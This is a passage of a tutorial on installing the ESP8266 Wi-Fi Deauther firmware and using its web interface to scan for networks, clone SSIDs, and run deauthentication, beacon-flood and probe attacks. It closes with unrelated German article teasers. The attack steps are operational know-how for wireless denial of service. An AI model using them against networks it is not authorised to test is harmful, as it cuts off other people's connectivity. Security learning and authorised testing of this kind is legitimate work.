Once that is done, you should be ready to program your board. Plug your ESP8266-based board into your computer. When you click on „Tools,“ you should see the correct port auto-selected, but if not, click on the „Board“ option and select the correct one under the Deauther Modules section.

If you’re using a bad cable, the port may not show up, so if you don’t see anything after you’ve completed the other steps, try another cable first. If you still don’t see anything, there’s a good chance you need to install a driver by following these instructions, which is common when using cheap knockoff boards.

Now, let’s download the code onto the ESP8266-based Deauther board. Clone the repository with the command below, and then move the „esp8266_deauther“ folder into your „Arduino“ folder.

~# git clone https://github.com/spacehuhn/esp8266_deauther.git

When it’s done downloading, open the „esp8266_deauther.ino“ file with Arduino from inside the „Arduino“ folder. Check your upload settings to make sure your board is properly selected, and press upload to send the program to the ESP8266 device!

Step 2Look for the Control Access Point

Once your Wi-Fi Deauther board is powered, you shouldn’t need a screen to interact with it. While it’s convenient to have a display to see what’s going on, we can rely on the web interface to control the ESP8266 device as well.

These chips are amazing because they can be put into many Wi-Fi modes, with the ability to join or even become their own Wi-Fi network. If you look on a smartphone or computer, you should see a Wi-Fi network nearby named „pwned.“ This is a network being created by our Deauther board!

To access it, connect to the Wi-Fi network and enter the password „deauther“ to join. Then, in a browser window, you can navigate to the default IP address of 192.168.4.1 or simply type deauth.me to access the web interface the Deauther board is creating.

Now, agree to the notice that appears advising you not to do anything bad with this project. Once you agree, you’ll have access to the control interface for the device.

Step 3Perform a Scan of the Area

First, let’s take a scan of the area around us. The first page you’ll find yourself on is the „Scan“ page, which breaks down results into a few easy to understand categories. First, there are access points. This will give you a list of every device advertising a Wi-fi network in range.

Further down the list, you’ll see devices that are connected to a network, as well as which network they are connected to. You can select the „Add“ button to save a particular device or network to your target list. Here, we’ll select „spot 2.4 ghz“ as the network we want to target.

Once you’ve selected a network to target, we can move on to the „SSIDs“ menu by clicking on the menu shortcut in the top left of the screen.

Step 4Select Target Networks

In the „SSIDs“ section, we’ll be able to clone networks, create fake networks, or simply Rickroll everyone.

The top field is for specifying any fake network we want to create. This includes the SSID, or network name, whether or not the network uses WPA security, and how many networks you want to create.

If you selected an access point before, you can click „Clone Selected APs“ to generate clones of the targeted network. There is also a module to generate random SSIDs, including several that are just the lines to „Never Gonna Give You Up.“

In the image below, we cloned the network many times, making it very hard to find the correct network.

Step 5Launch an Attack

Now, let’s check out the attacks we can launch in the „Attacks“ section of the menu. Here, we can see three primary kinds of attacks.

  • Deauth: This will attack any network in range, disconnecting it from Wi-Fi until you disable it. It’s worth mentioning that you are connected to the device via Wi-Fi, and this makes it likely that you may unintentionally prevent yourself from connecting to the device to turn it off. If you find yourself disconnected and you can’t get back in, you may need to unplug the board to get it to stop.
  • Beacon: This attack will create up to a thousand fake networks, either cloning nearby networks or creating entirely fake ones from scratch.
  • Probe: Here, the board will send probe requests asking for a network name that’s in the list you specify. This will confuse some Wi-Fi trackers and also sometimes cause Wi-Fi attack tools to create fake networks in response to the network names contained in the probe requests.

To begin the deauthentication attack, make sure you are somewhere where the only networks that are in range are ones you have permission to attack. Once you are, click the „Start“ button next to the „Deauth“ attack. When you feel the Wi-Fi devices in your local area have had enough punishment, click „Stop“ to end the attack.

The original Wi-Fi Deauther board also comes with the ability to add an external antenna. By doing so, it’s possible to extend or change the range of the device by adding a directional antenna.

Step 6Customize Your Settings

Now that we’ve explored the main attacks, we can also configure the board via the „Settings“ tab on the top left of the screen. Clicking on it will bring up a menu page allowing you to do things like change the name of the network used to communicate with the board, change the password, and change the channel the device broadcasts its network on.

Here, you’ll also find an option to create a „Hidden“ network, which might seem more stealthy to connect to. In fact, any device you connect to a hidden network will start calling out that network name any time the Wi-Fi is left on, making your phone more trackable.

The reasons devices that have connected to a hidden network always call for them is because they know the station is not broadcasting its network name, so it’s up to your device to always be asking if it is nearby.

You can customize settings as much as you like here, but be careful not to disable the Wi-Fi portal and the serial connection at the same time. Doing so will leave you with no way to communicate with the board, so make sure you leave at least one enabled to allow you to get back in.

Once you update your password and the name of your command-and-control Wi-Fi network, you’re ready to use the Wi-Fi Deauther anywhere, from any device. After making any changes to the menu or any other settings, make sure to press „Save“ and „Reload“ to apply the changes you made.

Microcontrollers Are Cheap, Efficient Cyber Weapons

The Raspberry Pi was revolutionary in giving access to powerful hacking tools to anyone who can afford a $35 board. With the Wi-Fi Deauther board, the boundaries of what can be done with low-cost Wi-Fi hardware has been pushed even further than before.

While microcontrollers don’t offer a full operating system to work with like a Raspberry Pi, the powerful attacks they’re capable of on their own make them more than worth checking out. While the Wi-Fi Deauther board can’t capture the numerous WPA handshakes it generates from nearby networks while in operation by itself, it’s a perfect companion tool for capturing WPA handshakes in Kali for later cracking.

I hope you enjoyed this guide to the Wi-Fi Deauther project! If you have any questions about this tutorial on the Wi-Fi Deauther board, leave a comment below, and feel free to reach me on Twitter @KodyKinzie.

Versteckte Kameras entdecken

Mikrofone und Kameras können an allen möglichen Orten versteckt werden, um ahnungslose Menschen auszuspionieren. An den meisten Orten ist es illegal, dass dich jemand ohne entsprechende Information aufnimmt, aber dies bedeutet nicht immer, dass du nicht aufgenommen wirst. Wenn du das Gefühl hast, dass du aufgenommen wirst, führe eine gründliche physische Suche durch und setze die dir verfügbare Technik ein, um versteckte Kameras und Mikrofone zu entdecken.

Kali Linux installieren und einrichten

Für Penetration-Tests und Sicherheitstests ist Kali Linux ein beliebtes Tool. Wie Sie es installieren, erfahren Sie hier!! Kali Linux auf der Festplatte installieren Laden Sie sich dazu zunächst Kali-Linux für Ihren PC herunter. Nun können Sie ein Programm wie beispielsweise „Etcher“ verwenden, um die ISO auf einem USB-Stick zu installieren. Booten Sie anschließend von diesem Stick und […]